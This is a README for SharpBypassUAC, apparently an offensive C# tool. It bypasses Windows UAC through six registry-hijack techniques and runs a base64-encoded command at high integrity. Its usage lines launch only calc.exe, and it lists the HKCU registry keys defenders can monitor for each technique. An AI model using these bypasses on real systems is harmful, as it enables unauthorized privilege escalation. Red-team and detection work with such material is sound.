Awesome

SharpBypassUAC

C# tool for UAC bypasses

Usage

SharpBypassUAC currently supports the eventvwr, fodhelper, computerdefaults, sdclt, slui, and DiskCleanup UAC bypasses.

SharpBypassUAC accepts a base64 encoded windows command to be executed in high integrity. The command is base64 encoded to be easily used in tools such as Covenant's "Assembly" task

Parameters

-b, --bypass=VALUE Bypass to execute: eventvwr, fodhelper, computerdefaults, sdclt, slui

-e, --encodedCommand=VALUE Base64 encoded command to execute

Example usage for eventvwr bypass to launch calc.exe

SharpBypassUAC.exe -b eventvwr -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for fodhelper bypass to launch calc.exe

SharpBypassUAC.exe -b fodhelper -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for computerdefaults bypass to launch calc.exe

SharpBypassUAC.exe -b computerdefaults -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for sdclt bypass to launch calc.exe

SharpBypassUAC.exe -b sdclt -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

• Note: this appears to only work on Windows 10 in my testing

Example usage for slui bypass to launch calc.exe

SharpBypassUAC.exe -b slui -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for DiskCleanup bypass to launch calc.exe

SharpBypassUAC.exe -b dikcleanup -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

• Note: The command you execute will need to end in "&& REM"

Detections

Most of these bypasses rely on modifying registry keys in the HKCU hive, specifically keys under HKCU\Software\Classes. HKCU\Software\Classes\ should be monitored for any new keys or modification to existing keys. If this is too noisy in your environment, the specific keys used for each technique are listed below.

Eventvwr

Registry modifications to:

• HKCU\Software\Classes\mscfile\Shell\Open\command
  • Modifies the "(default)" value with the command to execute

Fodhelper

Registry modifications to:

• HKCU\Software\Classes\ms-settings\Shell\Open\command
  • Modifies the "(default)" value with the command to execute
  • Modifies the "DelegateExecute" value with an empty value

Computerdefaults

Registry modifications to:

• HKCU\Software\Classes\ms-settings\Shell\Open\command
  • Modifies the "(default)" value with the command to execute
  • Modifies the "DelegateExecute" value with an empty value

SDCLT

Registry modifications to:

• HKCU\Software\Classes\Folder\shell\open\command
  • Modifies the "(default)" value with the command to execute
  • Modifies the "DelegateExecute" value with an empty value

SLUI

Registry modifications to:

• HKCU\Software\Classes\exefile\Shell\Open\command
  • Modifies the "(default)" value with the command to execute

DiskCleanup

Registry modifications to:

• HKCU\Environment
  • Modifies the "windir" value with the command to execute

Starts the "\Microsoft\Windows\DiskCleanup\SilentCleanup" scheduled task. Example:

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Credits

eventvwr: enigma0x3's Invoke-EventVwrBypass.ps1 script

fodhelper and computerdefaults: winscripting.blog's FodhelperBypass.ps1 script

sdclt: Emeric Nasi's blog post

slui: bytecode77's slui file handler hijack tool

DiskCleanup: enigma0x3's Bypassing UAC on Windows 10 using Disk Cleanup blog post and gushmazuko's DiskCleanupBypass_direct.ps1 script

Many of these were discovered by going through the UACME project found on github.